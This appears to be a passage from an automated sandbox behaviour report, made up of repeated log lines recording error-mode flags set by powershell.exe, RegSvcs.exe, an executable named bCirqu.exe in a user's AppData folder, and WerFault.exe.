Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
